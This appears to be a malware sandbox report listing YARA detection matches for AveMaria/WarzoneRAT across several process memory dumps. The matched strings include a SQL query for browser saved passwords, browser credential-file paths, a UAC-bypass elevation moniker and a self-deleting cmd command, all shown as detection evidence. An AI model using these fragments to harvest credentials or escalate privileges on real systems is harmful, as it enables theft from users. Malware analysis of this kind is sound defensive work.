29.2.explorer.exe.28d63b8.2.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x49604:$s1: RDPClip 0x49cec:$s2: Grabber 0x49800:$s3: Ave_Maria Stealer OpenSource 0x49900:$s4: \MidgetPorn\workspace\MsgBox.exe 0x49636:$s5: @\cmd.exe 0x4c848:$s6: /n:%temp%\ellocnak.xml 0x4c878:$s7: Hey I'm Admin 0x47170:$s8: warzone160
29.2.explorer.exe.28d63b8.2.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x49b50:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x48398:$a2: SMTP Password 0x475d8:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x4c728:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x49a58:$a5: for /F "usebackq tokens=*" %%A in (" 0x47dc8:$a6: \Torch\User Data\Default\Login Data 0x4c848:$a7: /n:%temp%\ellocnak.xml 0x48934:$a8: "os_crypt":{"encrypted_key":" 0x4c878:$a9: Hey I'm Admin 0x48260:$a10: \logins.json 0x488ac:$a11: Accounts\Account.rec0 0x47170:$a12: warzone160 0x49800:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
29.2.explorer.exe.28d63b8.2.raw.unpack	AveMaria_WarZone	unknown	unknown	0x49b50:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x4992c:$str2: MsgBox.exe 0x49bbc:$str4: \System32\cmd.exe 0x49800:$str6: Ave_Maria 0x49098:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x48398:$str8: SMTP Password 0x47678:$str11: \Google\Chrome\User Data\Default\Login Data 0x49064:$str12: \sqlmap.dll 0x4c728:$str16: Elevation:Administrator!new 0x4c848:$str17: /n:%temp%
8.2.explorer.exe.3a2b638.11.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x17ff0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.2.explorer.exe.3a2b638.11.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x17ff0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x17ff0:$c1: Elevation:Administrator!new:
8.2.explorer.exe.3a2b638.11.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x138e8:$a1: \Opera Software\Opera Stable\Login Data 0x13c10:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13558:$a3: \Google\Chrome\User Data\Default\Login Data
8.2.explorer.exe.3a2b638.11.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.2.explorer.exe.3a2b638.11.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.explorer.exe.3a2b638.11.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.2.explorer.exe.3a2b638.11.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x15add:$r1: Classes\Folder\shell\open\command 0x15b00:$k1: DelegateExecute
8.2.explorer.exe.3a2b638.11.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x154e4:$s1: RDPClip 0x15bcc:$s2: Grabber 0x156e0:$s3: Ave_Maria Stealer OpenSource 0x157e0:$s4: \MidgetPorn\workspace\MsgBox.exe 0x15516:$s5: @\cmd.exe 0x18110:$s6: /n:%temp%\ellocnak.xml 0x18140:$s7: Hey I'm Admin 0x13050:$s8: warzone160
8.2.explorer.exe.3a2b638.11.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x15a30:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x14278:$a2: SMTP Password 0x134b8:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x17ff0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x15938:$a5: for /F "usebackq tokens=*" %%A in (" 0x13ca8:$a6: \Torch\User Data\Default\Login Data 0x18110:$a7: /n:%temp%\ellocnak.xml 0x14814:$a8: "os_crypt":{"encrypted_key":" 0x18140:$a9: Hey I'm Admin 0x14140:$a10: \logins.json 0x1478c:$a11: Accounts\Account.rec0 0x13050:$a12: warzone160 0x156e0:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
8.2.explorer.exe.3a2b638.11.unpack	AveMaria_WarZone	unknown	unknown	0x15a30:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1580c:$str2: MsgBox.exe 0x15a9c:$str4: \System32\cmd.exe 0x156e0:$str6: Ave_Maria 0x14f78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14278:$str8: SMTP Password 0x13558:$str11: \Google\Chrome\User Data\Default\Login Data 0x14f44:$str12: \sqlmap.dll 0x17ff0:$str16: Elevation:Administrator!new 0x18110:$str17: /n:%temp%
29.2.explorer.exe.28e9850.3.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x39290:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
29.2.explorer.exe.28e9850.3.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x39290:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x39290:$c1: Elevation:Administrator!new:
29.2.explorer.exe.28e9850.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x34570:$a1: \Opera Software\Opera Stable\Login Data 0x34898:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x341e0:$a3: \Google\Chrome\User Data\Default\Login Data
29.2.explorer.exe.28e9850.3.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
29.2.explorer.exe.28e9850.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
29.2.explorer.exe.28e9850.3.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
29.2.explorer.exe.28e9850.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x36765:$r1: Classes\Folder\shell\open\command 0x36788:$k1: DelegateExecute
29.2.explorer.exe.28e9850.3.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x3616c:$s1: RDPClip 0x36854:$s2: Grabber 0x36368:$s3: Ave_Maria Stealer OpenSource 0x36468:$s4: \MidgetPorn\workspace\MsgBox.exe 0x3619e:$s5: @\cmd.exe 0x393b0:$s6: /n:%temp%\ellocnak.xml 0x393e0:$s7: Hey I'm Admin 0x33cd8:$s8: warzone160
29.2.explorer.exe.28e9850.3.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x366b8:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x34f00:$a2: SMTP Password 0x34140:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x39290:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x365c0:$a5: for /F "usebackq tokens=*" %%A in (" 0x34930:$a6: \Torch\User Data\Default\Login Data 0x393b0:$a7: /n:%temp%\ellocnak.xml 0x3549c:$a8: "os_crypt":{"encrypted_key":" 0x393e0:$a9: Hey I'm Admin 0x34dc8:$a10: \logins.json 0x35414:$a11: Accounts\Account.rec0 0x33cd8:$a12: warzone160 0x36368:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
29.2.explorer.exe.28e9850.3.raw.unpack	AveMaria_WarZone	unknown	unknown	0x366b8:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x36494:$str2: MsgBox.exe 0x36724:$str4: \System32\cmd.exe 0x36368:$str6: Ave_Maria 0x35c00:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x34f00:$str8: SMTP Password 0x341e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x35bcc:$str12: \sqlmap.dll 0x39290:$str16: Elevation:Administrator!new 0x393b0:$str17: /n:%temp%
8.2.explorer.exe.28e1ce0.7.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x48424:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.2.explorer.exe.28e1ce0.7.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x48424:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x48424:$c1: Elevation:Administrator!new:
8.2.explorer.exe.28e1ce0.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x43704:$a1: \Opera Software\Opera Stable\Login Data 0x43a2c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x43374:$a3: \Google\Chrome\User Data\Default\Login Data
8.2.explorer.exe.28e1ce0.7.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.2.explorer.exe.28e1ce0.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.explorer.exe.28e1ce0.7.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.2.explorer.exe.28e1ce0.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x458f9:$r1: Classes\Folder\shell\open\command 0x4591c:$k1: DelegateExecute
8.2.explorer.exe.28e1ce0.7.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x45300:$s1: RDPClip 0x459e8:$s2: Grabber 0x454fc:$s3: Ave_Maria Stealer OpenSource 0x455fc:$s4: \MidgetPorn\workspace\MsgBox.exe 0x45332:$s5: @\cmd.exe 0x48544:$s6: /n:%temp%\ellocnak.xml 0x48574:$s7: Hey I'm Admin 0x42e6c:$s8: warzone160
8.2.explorer.exe.28e1ce0.7.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x4584c:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x44094:$a2: SMTP Password 0x432d4:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x48424:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x45754:$a5: for /F "usebackq tokens=*" %%A in (" 0x43ac4:$a6: \Torch\User Data\Default\Login Data 0x48544:$a7: /n:%temp%\ellocnak.xml 0x44630:$a8: "os_crypt":{"encrypted_key":" 0x48574:$a9: Hey I'm Admin 0x43f5c:$a10: \logins.json 0x445a8:$a11: Accounts\Account.rec0 0x42e6c:$a12: warzone160 0x454fc:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
8.2.explorer.exe.28e1ce0.7.raw.unpack	AveMaria_WarZone	unknown	unknown	0x4584c:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x45628:$str2: MsgBox.exe 0x458b8:$str4: \System32\cmd.exe 0x454fc:$str6: Ave_Maria 0x44d94:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x44094:$str8: SMTP Password 0x43374:$str11: \Google\Chrome\User Data\Default\Login Data 0x44d60:$str12: \sqlmap.dll 0x48424:$str16: Elevation:Administrator!new 0x48544:$str17: /n:%temp%
20.2.explorer.exe.28daffc.3.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x454dc:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
20.2.explorer.exe.28daffc.3.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x454dc:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x454dc:$c1: Elevation:Administrator!new:
20.2.explorer.exe.28daffc.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x407bc:$a1: \Opera Software\Opera Stable\Login Data 0x40ae4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4042c:$a3: \Google\Chrome\User Data\Default\Login Data
20.2.explorer.exe.28daffc.3.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
20.2.explorer.exe.28daffc.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.explorer.exe.28daffc.3.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
20.2.explorer.exe.28daffc.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x429b1:$r1: Classes\Folder\shell\open\command 0x429d4:$k1: DelegateExecute
20.2.explorer.exe.28daffc.3.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x423b8:$s1: RDPClip 0x42aa0:$s2: Grabber 0x425b4:$s3: Ave_Maria Stealer OpenSource 0x426b4:$s4: \MidgetPorn\workspace\MsgBox.exe 0x423ea:$s5: @\cmd.exe 0x455fc:$s6: /n:%temp%\ellocnak.xml 0x4562c:$s7: Hey I'm Admin 0x3ff24:$s8: warzone160
20.2.explorer.exe.28daffc.3.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x42904:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x4114c:$a2: SMTP Password 0x4038c:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x454dc:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x4280c:$a5: for /F "usebackq tokens=*" %%A in (" 0x40b7c:$a6: \Torch\User Data\Default\Login Data 0x455fc:$a7: /n:%temp%\ellocnak.xml 0x416e8:$a8: "os_crypt":{"encrypted_key":" 0x4562c:$a9: Hey I'm Admin 0x41014:$a10: \logins.json 0x41660:$a11: Accounts\Account.rec0 0x3ff24:$a12: warzone160 0x425b4:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
20.2.explorer.exe.28daffc.3.raw.unpack	AveMaria_WarZone	unknown	unknown	0x42904:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x426e0:$str2: MsgBox.exe 0x42970:$str4: \System32\cmd.exe 0x425b4:$str6: Ave_Maria 0x41e4c:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x4114c:$str8: SMTP Password 0x4042c:$str11: \Google\Chrome\User Data\Default\Login Data 0x41e18:$str12: \sqlmap.dll 0x454dc:$str16: Elevation:Administrator!new 0x455fc:$str17: /n:%temp%
20.2.explorer.exe.28d3db0.2.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x4c728:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
20.2.explorer.exe.28d3db0.2.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x4c728:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x4c728:$c1: Elevation:Administrator!new:
20.2.explorer.exe.28d3db0.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a08:$a1: \Opera Software\Opera Stable\Login Data 0x47d30:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47678:$a3: \Google\Chrome\User Data\Default\Login Data
20.2.explorer.exe.28d3db0.2.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
20.2.explorer.exe.28d3db0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.explorer.exe.28d3db0.2.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
20.2.explorer.exe.28d3db0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x49bfd:$r1: Classes\Folder\shell\open\command 0x49c20:$k1: DelegateExecute
20.2.explorer.exe.28d3db0.2.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x49604:$s1: RDPClip 0x49cec:$s2: Grabber 0x49800:$s3: Ave_Maria Stealer OpenSource 0x49900:$s4: \MidgetPorn\workspace\MsgBox.exe 0x49636:$s5: @\cmd.exe 0x4c848:$s6: /n:%temp%\ellocnak.xml 0x4c878:$s7: Hey I'm Admin 0x47170:$s8: warzone160
20.2.explorer.exe.28d3db0.2.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x49b50:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x48398:$a2: SMTP Password 0x475d8:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x4c728:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x49a58:$a5: for /F "usebackq tokens=*" %%A in (" 0x47dc8:$a6: \Torch\User Data\Default\Login Data 0x4c848:$a7: /n:%temp%\ellocnak.xml 0x48934:$a8: "os_crypt":{"encrypted_key":" 0x4c878:$a9: Hey I'm Admin 0x48260:$a10: \logins.json 0x488ac:$a11: Accounts\Account.rec0 0x47170:$a12: warzone160 0x49800:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
20.2.explorer.exe.28d3db0.2.raw.unpack	AveMaria_WarZone	unknown	unknown	0x49b50:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x4992c:$str2: MsgBox.exe 0x49bbc:$str4: \System32\cmd.exe 0x49800:$str6: Ave_Maria 0x49098:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x48398:$str8: SMTP Password 0x47678:$str11: \Google\Chrome\User Data\Default\Login Data 0x49064:$str12: \sqlmap.dll 0x4c728:$str16: Elevation:Administrator!new 0x4c848:$str17: /n:%temp%
17.0.MSBuild.exe.400000.0.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
17.0.MSBuild.exe.400000.0.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
17.0.MSBuild.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
17.0.MSBuild.exe.400000.0.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
17.0.MSBuild.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.0.MSBuild.exe.400000.0.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
17.0.MSBuild.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x166dd:$r1: Classes\Folder\shell\open\command 0x16700:$k1: DelegateExecute
17.0.MSBuild.exe.400000.0.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x160e4:$s1: RDPClip 0x167cc:$s2: Grabber 0x162e0:$s3: Ave_Maria Stealer OpenSource 0x163e0:$s4: \MidgetPorn\workspace\MsgBox.exe 0x16116:$s5: @\cmd.exe 0x19310:$s6: /n:%temp%\ellocnak.xml 0x19340:$s7: Hey I'm Admin 0x13c50:$s8: warzone160
17.0.MSBuild.exe.400000.0.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x16630:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x14e78:$a2: SMTP Password 0x140b8:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x191f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x16538:$a5: for /F "usebackq tokens=*" %%A in (" 0x148a8:$a6: \Torch\User Data\Default\Login Data 0x19310:$a7: /n:%temp%\ellocnak.xml 0x15414:$a8: "os_crypt":{"encrypted_key":" 0x19340:$a9: Hey I'm Admin 0x14d40:$a10: \logins.json 0x1538c:$a11: Accounts\Account.rec0 0x13c50:$a12: warzone160 0x162e0:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
17.0.MSBuild.exe.400000.0.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
20.2.explorer.exe.28e7248.1.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x39290:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
20.2.explorer.exe.28e7248.1.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x39290:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x39290:$c1: Elevation:Administrator!new:
20.2.explorer.exe.28e7248.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x34570:$a1: \Opera Software\Opera Stable\Login Data 0x34898:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x341e0:$a3: \Google\Chrome\User Data\Default\Login Data
20.2.explorer.exe.28e7248.1.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
20.2.explorer.exe.28e7248.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.explorer.exe.28e7248.1.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
20.2.explorer.exe.28e7248.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x36765:$r1: Classes\Folder\shell\open\command 0x36788:$k1: DelegateExecute
20.2.explorer.exe.28e7248.1.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x3616c:$s1: RDPClip 0x36854:$s2: Grabber 0x36368:$s3: Ave_Maria Stealer OpenSource 0x36468:$s4: \MidgetPorn\workspace\MsgBox.exe 0x3619e:$s5: @\cmd.exe 0x393b0:$s6: /n:%temp%\ellocnak.xml 0x393e0:$s7: Hey I'm Admin 0x33cd8:$s8: warzone160
20.2.explorer.exe.28e7248.1.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x366b8:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x34f00:$a2: SMTP Password 0x34140:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x39290:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x365c0:$a5: for /F "usebackq tokens=*" %%A in (" 0x34930:$a6: \Torch\User Data\Default\Login Data 0x393b0:$a7: /n:%temp%\ellocnak.xml 0x3549c:$a8: "os_crypt":{"encrypted_key":" 0x393e0:$a9: Hey I'm Admin 0x34dc8:$a10: \logins.json 0x35414:$a11: Accounts\Account.rec0 0x33cd8:$a12: warzone160 0x36368:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
20.2.explorer.exe.28e7248.1.raw.unpack	AveMaria_WarZone	unknown	unknown	0x366b8:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x36494:$str2: MsgBox.exe 0x36724:$str4: \System32\cmd.exe 0x36368:$str6: Ave_Maria 0x35c00:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x34f00:$str8: SMTP Password 0x341e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x35bcc:$str12: \sqlmap.dll 0x39290:$str16: Elevation:Administrator!new 0x393b0:$str17: /n:%temp%
29.2.explorer.exe.28dd604.1.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x454dc:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
29.2.explorer.exe.28dd604.1.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x454dc:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x454dc:$c1: Elevation:Administrator!new:
29.2.explorer.exe.28dd604.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x407bc:$a1: \Opera Software\Opera Stable\Login Data 0x40ae4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4042c:$a3: \Google\Chrome\User Data\Default\Login Data
29.2.explorer.exe.28dd604.1.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
29.2.explorer.exe.28dd604.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
29.2.explorer.exe.28dd604.1.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
29.2.explorer.exe.28dd604.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x429b1:$r1: Classes\Folder\shell\open\command 0x429d4:$k1: DelegateExecute
29.2.explorer.exe.28dd604.1.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x423b8:$s1: RDPClip 0x42aa0:$s2: Grabber 0x425b4:$s3: Ave_Maria Stealer OpenSource 0x426b4:$s4: \MidgetPorn\workspace\MsgBox.exe 0x423ea:$s5: @\cmd.exe 0x455fc:$s6: /n:%temp%\ellocnak.xml 0x4562c:$s7: Hey I'm Admin 0x3ff24:$s8: warzone160
29.2.explorer.exe.28dd604.1.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x42904:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x4114c:$a2: SMTP Password 0x4038c:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x454dc:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x4280c:$a5: for /F "usebackq tokens=*" %%A in (" 0x40b7c:$a6: \Torch\User Data\Default\Login Data 0x455fc:$a7: /n:%temp%\ellocnak.xml 0x416e8:$a8: "os_crypt":{"encrypted_key":" 0x4562c:$a9: Hey I'm Admin 0x41014:$a10: \logins.json 0x41660:$a11: Accounts\Account.rec0 0x3ff24:$a12: warzone160 0x425b4:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
29.2.explorer.exe.28dd604.1.raw.unpack	AveMaria_WarZone	unknown	unknown	0x42904:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x426e0:$str2: MsgBox.exe 0x42970:$str4: \System32\cmd.exe 0x425b4:$str6: Ave_Maria 0x41e4c:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x4114c:$str8: SMTP Password 0x4042c:$str11: \Google\Chrome\User Data\Default\Login Data 0x41e18:$str12: \sqlmap.dll 0x454dc:$str16: Elevation:Administrator!new 0x455fc:$str17: /n:%temp%
8.2.explorer.exe.28daa94.5.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x4f670:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.2.explorer.exe.28daa94.5.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x4f670:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x4f670:$c1: Elevation:Administrator!new:
